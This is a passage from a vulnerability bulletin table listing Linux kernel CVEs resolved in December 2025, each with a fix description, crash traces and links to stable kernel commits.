| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: powerpc/64s: Fix VAS mm use after free The refcount on mm is dropped before the coprocessor is detached. | 2025-12-24 | not yet calculated | CVE-2023-54042 | https://git.kernel.org/stable/c/f7d92313002b2d543500cc417d8079aaed1fb0a8 https://git.kernel.org/stable/c/4e82f92c349ea603736ade1e814861c0182a55ad https://git.kernel.org/stable/c/db8657fdd53c5e3069149d7f957cb60e63027bb2 https://git.kernel.org/stable/c/421cd1544480f2458042fe7f4913a2069c4d7251 https://git.kernel.org/stable/c/b4bda59b47879cce38a6ec5a01cd3cac702b5331 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommufd: Do not add the same hwpt to the ioas->hwpt_list twice The hwpt is added to the hwpt_list only during its creation, it is never added again. This hunk is some missed leftover from rework. Adding it twice will corrupt the linked list in some cases. It affects HWPT specific attachment, which is something the test suite cannot cover until we can create a legitimate struct device with a non-system iommu "driver" (ie we need the bus removed from the iommu code) | 2025-12-24 | not yet calculated | CVE-2023-54043 | https://git.kernel.org/stable/c/c44adefdcf472f946f0632f4e0ddcbf3e00b8516 https://git.kernel.org/stable/c/b4ff830eca097df51af10a9be29e8cc817327919 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spmi: Add a check for remove callback when removing a SPMI driver When removing a SPMI driver, there can be a crash due to NULL pointer dereference if it does not have a remove callback defined. This is one such call trace observed when removing the QCOM SPMI PMIC driver: dump_backtrace.cfi_jt+0x0/0x8 dump_stack_lvl+0xd8/0x16c panic+0x188/0x498 __cfi_slowpath+0x0/0x214 __cfi_slowpath+0x1dc/0x214 spmi_drv_remove+0x16c/0x1e0 device_release_driver_internal+0x468/0x79c driver_detach+0x11c/0x1a0 bus_remove_driver+0xc4/0x124 driver_unregister+0x58/0x84 cleanup_module+0x1c/0xc24 [qcom_spmi_pmic] __do_sys_delete_module+0x3ec/0x53c __arm64_sys_delete_module+0x18/0x28 el0_svc_common+0xdc/0x294 el0_svc+0x38/0x9c el0_sync_handler+0x8c/0xf0 el0_sync+0x1b4/0x1c0 If a driver has all its resources allocated through devm_() APIs and does not need any other explicit cleanup, it would not require a remove callback to be defined. Hence, add a check for remove callback presence before calling it when removing a SPMI driver. | 2025-12-24 | not yet calculated | CVE-2023-54044 | https://git.kernel.org/stable/c/b95a69214daea4aab1c8bad96571d988a62e2c97 https://git.kernel.org/stable/c/699949219e35fe29fd42ccf8cd92c989c3d15109 https://git.kernel.org/stable/c/54dda732225555dc6d660e95793c54a0a44b612c https://git.kernel.org/stable/c/c45ab3ab9c371c9ac22bbe1217e5abb2e55a3d4b https://git.kernel.org/stable/c/ee0b6146317a98bfec848d7bde5586beb245a38f https://git.kernel.org/stable/c/428cc252701d6864151f3a296ffc23e1e49a7408 https://git.kernel.org/stable/c/af763c29b9e7040fedd0077bca053b101438a3a4 https://git.kernel.org/stable/c/0f3ef30c1c05502f5de3b73b3715d5994845c1b4 https://git.kernel.org/stable/c/b56eef3e16d888883fefab47425036de80dd38fc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: audit: fix possible soft lockup in __audit_inode_child() Tracefs or debugfs may cause hundreds to thousands of PATH records, too many PATH records may cause soft lockup. For example: 1. CONFIG_KASAN=y && CONFIG_PREEMPTION=n 2. auditctl -a exit,always -S open -k key 3. sysctl -w kernel.watchdog_thresh=5 4. mkdir /sys/kernel/debug/tracing/instances/test There may be a soft lockup as follows: watchdog: BUG: soft lockup - CPU#45 stuck for 7s! [mkdir:15498] Kernel panic - not syncing: softlockup: hung tasks Call trace: dump_backtrace+0x0/0x30c show_stack+0x20/0x30 dump_stack+0x11c/0x174 panic+0x27c/0x494 watchdog_timer_fn+0x2bc/0x390 __run_hrtimer+0x148/0x4fc __hrtimer_run_queues+0x154/0x210 hrtimer_interrupt+0x2c4/0x760 arch_timer_handler_phys+0x48/0x60 handle_percpu_devid_irq+0xe0/0x340 __handle_domain_irq+0xbc/0x130 gic_handle_irq+0x78/0x460 el1_irq+0xb8/0x140 __audit_inode_child+0x240/0x7bc tracefs_create_file+0x1b8/0x2a0 trace_create_file+0x18/0x50 event_create_dir+0x204/0x30c __trace_add_new_event+0xac/0x100 event_trace_add_tracer+0xa0/0x130 trace_array_create_dir+0x60/0x140 trace_array_create+0x1e0/0x370 instance_mkdir+0x90/0xd0 tracefs_syscall_mkdir+0x68/0xa0 vfs_mkdir+0x21c/0x34c do_mkdirat+0x1b4/0x1d4 __arm64_sys_mkdirat+0x4c/0x60 el0_svc_common.constprop.0+0xa8/0x240 do_el0_svc+0x8c/0xc0 el0_svc+0x20/0x30 el0_sync_handler+0xb0/0xb4 el0_sync+0x160/0x180 Therefore, we add cond_resched() to __audit_inode_child() to fix it. | 2025-12-24 | not yet calculated | CVE-2023-54045 | https://git.kernel.org/stable/c/d061e2bfc20f2914656385816e0d20566213c54c https://git.kernel.org/stable/c/1640c7bd4eddec6c72f3a99cbb74e333a2ce9f5d https://git.kernel.org/stable/c/f6364fa751d7486502c777f124a14d4d543fc5eb https://git.kernel.org/stable/c/98ef243d5900d75a64539a2165745bffbb155d43 https://git.kernel.org/stable/c/0152e7758cc4e9f8bfba8dbea4438d8e488d6c08 https://git.kernel.org/stable/c/9ca08adb75fb40a8f742c371927ee73f9dc753bf https://git.kernel.org/stable/c/8a40b491372966ba5426e138a53460985565d5a6 https://git.kernel.org/stable/c/8e76b944a7b9bddef190ffe2e29c9ae342ab91ed https://git.kernel.org/stable/c/b59bc6e37237e37eadf50cd5de369e913f524463 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: essiv - Handle EBUSY correctly As it is essiv only handles the special return value of EINPROGRESS, which means that in all other cases it will free data related to the request. However, as the caller of essiv may specify MAY_BACKLOG, we also need to expect EBUSY and treat it in the same way. Otherwise backlogged requests will trigger a use-after-free. | 2025-12-24 | not yet calculated | CVE-2023-54046 | https://git.kernel.org/stable/c/c61e7d182ee3f3f5ecf18a2964e303d49c539b52 https://git.kernel.org/stable/c/796e02cca30a67322161f0745e5ce994bbe75605 https://git.kernel.org/stable/c/840a1d3b77c1b062bd62b4733969a5b1efc274ce https://git.kernel.org/stable/c/a006aa3eedb8bfd6fe317c3cfe9c86ffe76b2385 https://git.kernel.org/stable/c/69c67d451fc19d88e54f7d97e8e7c093e08357e1 https://git.kernel.org/stable/c/b5a772adf45a32c68bef28e60621f12617161556 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/rockchip: dw_hdmi: cleanup drm encoder during unbind This fixes a use-after-free crash during rmmod. The DRM encoder is embedded inside the larger rockchip_hdmi, which is allocated with the component. The component memory gets freed before the main drm device is destroyed. Fix it by running encoder cleanup before tearing down its container. [moved encoder cleanup above clk_disable, similar to bind-error-path] | 2025-12-24 | not yet calculated | CVE-2023-54047 | https://git.kernel.org/stable/c/110d4202522373d629d14597af9bac97eb58bd67 https://git.kernel.org/stable/c/218fe9b624545f4bcfb16cdb35ac3d60c8b0d8c7 https://git.kernel.org/stable/c/b5af48eedcb53491c02ded55d5991e03d6da6dbf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/bnxt_re: Prevent handling any completions after qp destroy HW may generate completions that indicates QP is destroyed. Driver should not be scheduling any more completion handlers for this QP, after the QP is destroyed. Since CQs are active during the QP destroy, driver may still schedule completion handlers. This can cause a race where the destroy_cq and poll_cq running simultaneously. Snippet of kernel panic while doing bnxt_re driver load unload in loop. This indicates a poll after the CQ is freed. [77786.481636] Call Trace: [77786.481640] <TASK> [77786.481644] bnxt_re_poll_cq+0x14a/0x620 [bnxt_re] [77786.481658] ? kvm_clock_read+0x14/0x30 [77786.481693] __ib_process_cq+0x57/0x190 [ib_core] [77786.481728] ib_cq_poll_work+0x26/0x80 [ib_core] [77786.481761] process_one_work+0x1e5/0x3f0 [77786.481768] worker_thread+0x50/0x3a0 [77786.481785] ? __pfx_worker_thread+0x10/0x10 [77786.481790] kthread+0xe2/0x110 [77786.481794] ? __pfx_kthread+0x10/0x10 [77786.481797] ret_from_fork+0x2c/0x50 To avoid this, complete all completion handlers before returning the destroy QP. If free_cq is called soon after destroy_qp, IB stack will cancel the CQ work before invoking the destroy_cq verb and this will prevent any race mentioned. | 2025-12-24 | not yet calculated | CVE-2023-54048 | https://git.kernel.org/stable/c/b79a0e71d6e8692e0b6da05f8aaa7d69191cf7e7 https://git.kernel.org/stable/c/b8500538b8f5b2cd86b02754c8de83eaa7a2d6ba https://git.kernel.org/stable/c/7faa6097694164380ed19600c7a7993d071270b9 https://git.kernel.org/stable/c/b5bbc6551297447d3cca55cf907079e206e9cd82 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rpmsg: glink: Add check for kstrdup Add check for the return value of kstrdup() and return the error if it fails in order to avoid NULL pointer dereference. | 2025-12-24 | not yet calculated | CVE-2023-54049 | https://git.kernel.org/stable/c/5197498c902502127a47abda5359dd7f1d41946f https://git.kernel.org/stable/c/13928a837e0f014dac0322dd9f8a67c486e7f232 https://git.kernel.org/stable/c/efa7f31669f04084ed5996ed467ba529f4c90467 https://git.kernel.org/stable/c/71ac2ffd7f80fdd350486f6645dc48456e55a59b https://git.kernel.org/stable/c/abd740db896b3c588dced175af98b95852c1854b https://git.kernel.org/stable/c/cae0787e408c30a575760a531ccb69a6b48bbfaf https://git.kernel.org/stable/c/174cf8853857c190a3c4f1f1d2d06cfd095fe859 https://git.kernel.org/stable/c/e3734a9558afac91df3c655a6f2376b9d14933b7 https://git.kernel.org/stable/c/b5c9ee8296a3760760c7b5d2e305f91412adc795 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ubifs: Fix memleak when insert_old_idx() failed Following process will cause a memleak for copied up znode: dirty_cow_znode zn = copy_znode(c, znode); err = insert_old_idx(c, zbr->lnum, zbr->offs); if (unlikely(err)) return ERR_PTR(err); // No one refers to zn. Fetch a reproducer in [Link]. Function copy_znode() is split into 2 parts: resource allocation and znode replacement, insert_old_idx() is split in similar way, so resource cleanup could be done in error handling path without corrupting metadata(mem & disk). It's okay that old index inserting is put behind of add_idx_dirt(), old index is used in layout_leb_in_gaps(), so the two processes do not depend on each other. | 2025-12-24 | not yet calculated | CVE-2023-54050 | https://git.kernel.org/stable/c/cc29c7216d7f057eb0613b97dc38c7e1962a88d2 https://git.kernel.org/stable/c/6f2eee5457bc48b0426dedfd78cdbdea241a6edb https://git.kernel.org/stable/c/66e9f2fb3e753f820bec2a98e8c6387029988320 https://git.kernel.org/stable/c/3ae75f82c33fa1b4ca2006b55c84f4ef4a428d4d https://git.kernel.org/stable/c/ef9aac603659e9ffe7d69ae16e3f0fc0991a965b https://git.kernel.org/stable/c/79079cebbeed624b9d01cfcf1e3254ae1a1f6e14 https://git.kernel.org/stable/c/a6da0ab9847779e05a7416c7a98148b549de69ef https://git.kernel.org/stable/c/b5fda08ef213352ac2df7447611eb4d383cce929 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: do not allow gso_size to be set to GSO_BY_FRAGS One missing check in virtio_net_hdr_to_skb() allowed syzbot to crash kernels again [1] Do not allow gso_size to be set to GSO_BY_FRAGS (0xffff), because this magic value is used by the kernel. [1] general protection fault, probably for non-canonical address 0xdffffc000000000e: 0000 [#1] PREEMPT SMP KASAN KASAN: null-ptr-deref in range [0x0000000000000070-0x0000000000000077] CPU: 0 PID: 5039 Comm: syz-executor401 Not tainted 6.5.0-rc5-next-20230809-syzkaller #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/26/2023 RIP: 0010:skb_segment+0x1a52/0x3ef0 net/core/skbuff.c:4500 Code: 00 00 00 e9 ab eb ff ff e8 6b 96 5d f9 48 8b 84 24 00 01 00 00 48 8d 78 70 48 b8 00 00 00 00 00 fc ff df 48 89 fa 48 c1 ea 03 <0f> b6 04 02 84 c0 74 08 3c 03 0f 8e ea 21 00 00 48 8b 84 24 00 01 RSP: 0018:ffffc90003d3f1c8 EFLAGS: 00010202 RAX: dffffc0000000000 RBX: 000000000001fffe RCX: 0000000000000000 RDX: 000000000000000e RSI: ffffffff882a3115 RDI: 0000000000000070 RBP: ffffc90003d3f378 R08: 0000000000000005 R09: 000000000000ffff R10: 000000000000ffff R11: 5ee4a93e456187d6 R12: 000000000001ffc6 R13: dffffc0000000000 R14: 0000000000000008 R15: 000000000000ffff FS: 00005555563f2380(0000) GS:ffff8880b9800000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000020020000 CR3: 000000001626d000 CR4: 00000000003506f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> udp6_ufo_fragment+0x9d2/0xd50 net/ipv6/udp_offload.c:109 ipv6_gso_segment+0x5c4/0x17b0 net/ipv6/ip6_offload.c:120 skb_mac_gso_segment+0x292/0x610 net/core/gso.c:53 __skb_gso_segment+0x339/0x710 net/core/gso.c:124 skb_gso_segment include/net/gso.h:83 [inline] validate_xmit_skb+0x3a5/0xf10 net/core/dev.c:3625 __dev_queue_xmit+0x8f0/0x3d60 net/core/dev.c:4329 dev_queue_xmit include/linux/netdevice.h:3082 [inline] packet_xmit+0x257/0x380 net/packet/af_packet.c:276 packet_snd net/packet/af_packet.c:3087 [inline] packet_sendmsg+0x24c7/0x5570 net/packet/af_packet.c:3119 sock_sendmsg_nosec net/socket.c:727 [inline] sock_sendmsg+0xd9/0x180 net/socket.c:750 ____sys_sendmsg+0x6ac/0x940 net/socket.c:2496 ___sys_sendmsg+0x135/0x1d0 net/socket.c:2550 __sys_sendmsg+0x117/0x1e0 net/socket.c:2579 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x38/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd RIP: 0033:0x7ff27cdb34d9 | 2025-12-24 | not yet calculated | CVE-2023-54051 | https://git.kernel.org/stable/c/a5f9e5804d239d288d983db36bbed45ed10729a0 https://git.kernel.org/stable/c/4c9bfadb4301daaceb6c575fa6ad3bc82c152e79 https://git.kernel.org/stable/c/210ff31342ade546d8d9d0ec4d3cf9cb50ae632d https://git.kernel.org/stable/c/0a593e8a9d24360fbc469c5897d0791aa2f20ed3 https://git.kernel.org/stable/c/578371ce0d7f67ea1e65817c04478aaab0d36b68 https://git.kernel.org/stable/c/2e03a92b241102aaf490439aa1b00239f84f530f https://git.kernel.org/stable/c/e3636862f5595b3d2f02650f7b21d39043a34f3e https://git.kernel.org/stable/c/b616be6b97688f2f2bd7c4a47ab32f27f94fb2a9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mt76: mt7921: fix skb leak by txs missing in AMSDU txs may be dropped if the frame is aggregated in AMSDU. When the problem shows up, some SKBs would be held in driver, causing the network to stop temporarily. Even if the problem can be recovered by txs timeout handling, mt7921 still needs to disable txs in AMSDU to avoid this issue. | 2025-12-24 | not yet calculated | CVE-2023-54052 | https://git.kernel.org/stable/c/1cd102aaedb277fbe81dd08cd9f5cae951de2bff https://git.kernel.org/stable/c/e74778e91fedc3b2a0143264887bbb32508c5000 https://git.kernel.org/stable/c/bf5d3fad7219b8de7d3a9cb59f0ea5243b018f07 https://git.kernel.org/stable/c/b642f4c5f3de0a8f47808d32b1ebd9c427a42a66 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: pcie: fix possible NULL pointer dereference It is possible that iwl_pci_probe() will fail and free the trans, then afterwards iwl_pci_remove() will be called and crash by trying to access trans which is already freed, fix it. iwlwifi 0000:01:00.0: Detected crf-id 0xa5a5a5a2, cnv-id 0xa5a5a5a2 wfpm id 0xa5a5a5a2 iwlwifi 0000:01:00.0: Can't find a correct rfid for crf id 0x5a2 ... BUG: kernel NULL pointer dereference, address: 0000000000000028 ... RIP: 0010:iwl_pci_remove+0x12/0x30 [iwlwifi] pci_device_remove+0x3e/0xb0 device_release_driver_internal+0x103/0x1f0 driver_detach+0x4c/0x90 bus_remove_driver+0x5c/0xd0 driver_unregister+0x31/0x50 pci_unregister_driver+0x40/0x90 iwl_pci_unregister_driver+0x15/0x20 [iwlwifi] __exit_compat+0x9/0x98 [iwlwifi] __x64_sys_delete_module+0x147/0x260 | 2025-12-24 | not yet calculated | CVE-2023-54053 | https://git.kernel.org/stable/c/f6f2d16c77f936041b8ac495fceabded4ec6c83c https://git.kernel.org/stable/c/0fc0d287c1e7dcb39a3b9bb0f8679cd68c2156c7 https://git.kernel.org/stable/c/7545f21eee1356ec98581125c4dba9c4c0cc7397 https://git.kernel.org/stable/c/0f9a1bcb94016d3a3c455a77b01f6bb06e15f6eb https://git.kernel.org/stable/c/dcd23aa6cc0ded7950b60ce1badb80b84045c6c0 https://git.kernel.org/stable/c/b655b9a9f8467684cfa8906713d33b71ea8c8f54 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: qla2xxx: Fix buffer overrun Klocwork warning: Buffer Overflow - Array Index Out of Bounds Driver uses fc_els_flogi to calculate size of buffer. The actual buffer is nested inside of fc_els_flogi which is smaller. Replace structure name to allow proper size calculation. | 2025-12-24 | not yet calculated | CVE-2023-54054 | https://git.kernel.org/stable/c/eecb8a491c824a9376155d26ec95b6d0054c059c https://git.kernel.org/stable/c/89250e775dcc4482d8e970ed92ad2c9458b14a8a https://git.kernel.org/stable/c/2dddbf8de128289a3fb7ae38d9bc4b2217205ec1 https://git.kernel.org/stable/c/d5e7c9cd56e987c8687859a0bf38fd86aa8f3cec https://git.kernel.org/stable/c/b68710a8094fdffe8dd4f7a82c82649f479bb453 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/irdma: Fix memory leak of PBLE objects On rmmod of irdma, the PBLE object memory is not being freed. PBLE object memory is not statically pre-allocated at function initialization time unlike other HMC objects. PBLE objects and the Segment Descriptors (SD) for them can be dynamically allocated during scale up and SDs remain allocated till function deinitialization. Fix this leak by adding IRDMA_HMC_IW_PBLE to the iw_hmc_obj_types[] table and skip pbles in irdma_create_hmc_obj but not in irdma_del_hmc_objects(). | 2025-12-24 | not yet calculated | CVE-2023-54055 | https://git.kernel.org/stable/c/810250c9c6616fe131099c0e51c61f2110ed07bf https://git.kernel.org/stable/c/ee02fa4a71bdb95a444124e5c11eaa22f1f44738 https://git.kernel.org/stable/c/adf58bd4018fbcd990c62e840afd2f178eefad60 https://git.kernel.org/stable/c/b69a6979dbaa2453675fe9c71bdc2497fedb11f9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: kheaders: Use array declaration instead of char Under CONFIG_FORTIFY_SOURCE, memcpy() will check the size of destination and source buffers. Defining kernel_headers_data as "char" would trip this check. Since these addresses are treated as byte arrays, define them as arrays (as done everywhere else). This was seen with: $ cat /sys/kernel/kheaders.tar.xz >> /dev/null detected buffer overflow in memcpy kernel BUG at lib/string_helpers.c:1027! ... RIP: 0010:fortify_panic+0xf/0x20 [...] Call Trace: <TASK> ikheaders_read+0x45/0x50 [kheaders] kernfs_fop_read_iter+0x1a4/0x2f0 ... | 2025-12-24 | not yet calculated | CVE-2023-54056 | https://git.kernel.org/stable/c/719459877d58c8aced5845c1e5b98d8d87d09197 https://git.kernel.org/stable/c/fcd2da2e6bf2640a31a2a5b118b50dc3635c707b https://git.kernel.org/stable/c/4a07d2d511e2703efd4387891d49e0326f1157f3 https://git.kernel.org/stable/c/b9f6845a492de20679b84bda6b08be347c5819da https://git.kernel.org/stable/c/d6d1af6b8611801b585c53c0cc63626c8d339e96 https://git.kernel.org/stable/c/82d2e01b95c439fe55fab5e04fc83387c42d3a48 https://git.kernel.org/stable/c/b69edab47f1da8edd8e7bfdf8c70f51a2a5d89fb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu/amd: Add a length limitation for the ivrs_acpihid command-line parameter The 'acpiid' buffer in the parse_ivrs_acpihid function may overflow, because the string specifier in the format string sscanf() has no width limitation. Found by InfoTeCS on behalf of Linux Verification Center (linuxtesting.org) with SVACE. | 2025-12-24 | not yet calculated | CVE-2023-54057 | https://git.kernel.org/stable/c/5e97dc748d13fad582136ba0c8cec215c7aeeb17 https://git.kernel.org/stable/c/f2a5ec7f7b28f9b9cd5fac232ff51019a7f7b9e9 https://git.kernel.org/stable/c/c513043e0afe6a8ba79d00af358655afabb576d2 https://git.kernel.org/stable/c/2ae19ac3ea82a5b87a81c10adbb497c9e58bdd60 https://git.kernel.org/stable/c/63cd11165e5e0ea2012254c764003eda1f9adb7d https://git.kernel.org/stable/c/b6b26d86c61c441144c72f842f7469bb686e1211 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: firmware: arm_ffa: Check if ffa_driver remove is present before executing Currently ffa_drv->remove() is called unconditionally from ffa_device_remove(). Since the driver registration doesn't check for it and allows it to be registered without .remove callback, we need to check for the presence of it before executing it from ffa_device_remove() to avoid a NULL pointer dereference like the one below: \| Unable to handle kernel NULL pointer dereference at virtual address 0000000000000000 \| Mem abort info: \| ESR = 0x0000000086000004 \| EC = 0x21: IABT (current EL), IL = 32 bits \| SET = 0, FnV = 0 \| EA = 0, S1PTW = 0 \| FSC = 0x04: level 0 translation fault \| user pgtable: 4k pages, 48-bit VAs, pgdp=0000000881cc8000 \| [0000000000000000] pgd=0000000000000000, p4d=0000000000000000 \| Internal error: Oops: 0000000086000004 [#1] PREEMPT SMP \| CPU: 3 PID: 130 Comm: rmmod Not tainted 6.3.0-rc7 #6 \| Hardware name: FVP Base RevC (DT) \| pstate: 63402809 (nZCv daif +PAN -UAO +TCO +DIT -SSBS BTYPE=-c) \| pc : 0x0 \| lr : ffa_device_remove+0x20/0x2c \| Call trace: \| 0x0 \| device_release_driver_internal+0x16c/0x260 \| driver_detach+0x90/0xd0 \| bus_remove_driver+0xdc/0x11c \| driver_unregister+0x30/0x54 \| ffa_driver_unregister+0x14/0x20 \| cleanup_module+0x18/0xeec \| __arm64_sys_delete_module+0x234/0x378 \| invoke_syscall+0x40/0x108 \| el0_svc_common+0xb4/0xf0 \| do_el0_svc+0x30/0xa4 \| el0_svc+0x2c/0x7c \| el0t_64_sync_handler+0x84/0xf0 \| el0t_64_sync+0x190/0x194 | 2025-12-24 | not yet calculated | CVE-2023-54058 | https://git.kernel.org/stable/c/6a26c62625c59b8dd7f52c518cb4f60a63470a0e https://git.kernel.org/stable/c/ad73dc7263ea90302d6c7eeb7e9f7cbcfa0b0617 https://git.kernel.org/stable/c/48399c297c46b4c8e77ebcf071bb586a42d0ca4e https://git.kernel.org/stable/c/b71b55248a580e9c9befc4ae060539f1f8e477da |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: soc: mediatek: mtk-svs: Enable the IRQ later If the system does not come from reset (like when it is booted via kexec()), the peripheral might trigger an IRQ before the data structures are initialised. [ 0.227710] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000f08 [ 0.227913] Call trace: [ 0.227918] svs_isr+0x8c/0x538 | 2025-12-24 | not yet calculated | CVE-2023-54059 | https://git.kernel.org/stable/c/6b99ebd30d65ee5ab8e8dd1d378550911eff5e4f https://git.kernel.org/stable/c/66ea96629bbccf1b483be506f3daff754069cdd3 https://git.kernel.org/stable/c/b74952aba6c3f47e7f2c5165abaeefa44c377140 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommufd: Set end correctly when doing batch carry Even though the test suite covers this it somehow became obscured that this wasn't working. The test iommufd_ioas.mock_domain.access_domain_destory would blow up rarely. end should be set to 1 because this just pushed an item, the carry, to the pfns list. Sometimes the test would blow up with: BUG: kernel NULL pointer dereference, address: 0000000000000000 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: 0000 [#1] SMP CPU: 5 PID: 584 Comm: iommufd Not tainted 6.5.0-rc1-dirty #1236 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014 RIP: 0010:batch_unpin+0xa2/0x100 [iommufd] Code: 17 48 81 fe ff ff 07 00 77 70 48 8b 15 b7 be 97 e2 48 85 d2 74 14 48 8b 14 fa 48 85 d2 74 0b 40 0f b6 f6 48 c1 e6 04 48 01 f2 <48> 8b 3a 48 c1 e0 06 89 ca 48 89 de 48 83 e7 f0 48 01 c7 e8 96 dc RSP: 0018:ffffc90001677a58 EFLAGS: 00010246 RAX: 00007f7e2646f000 RBX: 0000000000000000 RCX: 0000000000000001 RDX: 0000000000000000 RSI: 00000000fefc4c8d RDI: 0000000000fefc4c RBP: ffffc90001677a80 R08: 0000000000000048 R09: 0000000000000200 R10: 0000000000030b98 R11: ffffffff81f3bb40 R12: 0000000000000001 R13: ffff888101f75800 R14: ffffc90001677ad0 R15: 00000000000001fe FS: 00007f9323679740(0000) GS:ffff8881ba540000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000000 CR3: 0000000105ede003 CR4: 00000000003706a0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> ? show_regs+0x5c/0x70 ? __die+0x1f/0x60 ? page_fault_oops+0x15d/0x440 ? lock_release+0xbc/0x240 ? exc_page_fault+0x4a4/0x970 ? asm_exc_page_fault+0x27/0x30 ? batch_unpin+0xa2/0x100 [iommufd] ? batch_unpin+0xba/0x100 [iommufd] __iopt_area_unfill_domain+0x198/0x430 [iommufd] ? __mutex_lock+0x8c/0xb80 ? __mutex_lock+0x6aa/0xb80 ? xa_erase+0x28/0x30 ? iopt_table_remove_domain+0x162/0x320 [iommufd] ? lock_release+0xbc/0x240 iopt_area_unfill_domain+0xd/0x10 [iommufd] iopt_table_remove_domain+0x195/0x320 [iommufd] iommufd_hw_pagetable_destroy+0xb3/0x110 [iommufd] iommufd_object_destroy_user+0x8e/0xf0 [iommufd] iommufd_device_detach+0xc5/0x140 [iommufd] iommufd_selftest_destroy+0x1f/0x70 [iommufd] iommufd_object_destroy_user+0x8e/0xf0 [iommufd] iommufd_destroy+0x3a/0x50 [iommufd] iommufd_fops_ioctl+0xfb/0x170 [iommufd] __x64_sys_ioctl+0x40d/0x9a0 do_syscall_64+0x3c/0x80 entry_SYSCALL_64_after_hwframe+0x46/0xb0 | 2025-12-24 | not yet calculated | CVE-2023-54060 | https://git.kernel.org/stable/c/176f36a376c417b58d19f79edfce20db9317eaa2 https://git.kernel.org/stable/c/b7c822fa6b7701b17e139f1c562fc24135880ed4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86: fix clear_user_rep_good() exception handling annotation This code no longer exists in mainline, because it was removed in commit d2c95f9d6802 ("x86: don't use REP_GOOD or ERMS for user memory clearing") upstream. However, rather than backport the full range of x86 memory clearing and copying cleanups, fix the exception table annotation placement for the final 'rep movsb' in clear_user_rep_good(): rather than pointing at the actual instruction that did the user space access, it pointed to the register move just before it. That made sense from a code flow standpoint, but not from an actual usage standpoint: it means that if user access takes an exception, the exception handler won't actually find the instruction in the exception tables. As a result, rather than fixing it up and returning -EFAULT, it would then turn it into a kernel oops report instead, something like: BUG: unable to handle page fault for address: 0000000020081000 #PF: supervisor write access in kernel mode #PF: error_code(0x0002) - not-present page ... RIP: 0010:clear_user_rep_good+0x1c/0x30 arch/x86/lib/clear_page_64.S:147 ... Call Trace: __clear_user arch/x86/include/asm/uaccess_64.h:103 [inline] clear_user arch/x86/include/asm/uaccess_64.h:124 [inline] iov_iter_zero+0x709/0x1290 lib/iov_iter.c:800 iomap_dio_hole_iter fs/iomap/direct-io.c:389 [inline] iomap_dio_iter fs/iomap/direct-io.c:440 [inline] __iomap_dio_rw+0xe3d/0x1cd0 fs/iomap/direct-io.c:601 iomap_dio_rw+0x40/0xa0 fs/iomap/direct-io.c:689 ext4_dio_read_iter fs/ext4/file.c:94 [inline] ext4_file_read_iter+0x4be/0x690 fs/ext4/file.c:145 call_read_iter include/linux/fs.h:2183 [inline] do_iter_readv_writev+0x2e0/0x3b0 fs/read_write.c:733 do_iter_read+0x2f2/0x750 fs/read_write.c:796 vfs_readv+0xe5/0x150 fs/read_write.c:916 do_preadv+0x1b6/0x270 fs/read_write.c:1008 __do_sys_preadv2 fs/read_write.c:1070 [inline] __se_sys_preadv2 fs/read_write.c:1061 [inline] __x64_sys_preadv2+0xef/0x150 fs/read_write.c:1061 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x39/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd which then looks like a filesystem bug rather than the incorrect exception annotation that it is. [ The alternative to this one-liner fix is to take the upstream series that cleans this all up: 68674f94ffc9 ("x86: don't use REP_GOOD or ERMS for small memory copies") 20f3337d350c ("x86: don't use REP_GOOD or ERMS for small memory clearing") adfcf4231b8c ("x86: don't use REP_GOOD or ERMS for user memory copies") * d2c95f9d6802 ("x86: don't use REP_GOOD or ERMS for user memory clearing") 3639a535587d ("x86: move stac/clac from user copy routines into callers") 577e6a7fd50d ("x86: inline the 'rep movs' in user copies for the FSRM case") 8c9b6a88b7e2 ("x86: improve on the non-rep 'clear_user' function") 427fda2c8a49 ("x86: improve on the non-rep 'copy_user' function") * e046fe5a36a9 ("x86: set FSRS automatically on AMD CPUs that have FSRM") e1f2750edc4a ("x86: remove 'zerorest' argument from __copy_user_nocache()") 034ff37d3407 ("x86: rewrite '__copy_user_nocache' function") with either the whole series or at a minimum the two marked commits being needed to fix this issue ] | 2025-12-24 | not yet calculated | CVE-2023-54061 | 